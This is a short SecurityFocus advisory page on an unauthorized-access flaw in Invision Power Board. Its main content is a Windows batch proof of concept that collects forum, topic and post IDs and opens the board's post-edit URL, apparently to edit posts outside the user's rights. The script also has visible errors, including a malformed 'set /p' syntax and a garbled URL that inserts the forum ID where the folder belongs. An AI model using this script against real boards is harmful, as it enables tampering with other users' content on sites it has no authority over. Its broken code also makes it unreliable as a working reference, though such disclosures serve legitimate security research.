Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Invision Power Board Unauthorized Access Vulnerability

An exploit is not required.

The following proof of concept is available:
echo off
cls
title Ipb Edit Bug
color a
echo enter url(example:www.example.com):
set /p %url%=
echo enter Folder(example:/forums):
set /p %Folder%=
echo enter Forum id(example:5) you are moderating:
set /p %forumid%=
echo enter topic id(example:103226) you want to edit:
set /p %topicid%=
echo enter p=num(example:760594) id you want to edit:
set /p %pnum%=
echo enter any key to go the edit post page...
pause
start iexplore.exe %url%forumid%/index.php?act=Post&CODE=08&f=%forumid%&t=%topicid%&p=%pnum%







 

Privacy Statement
Copyright 2008, SecurityFocus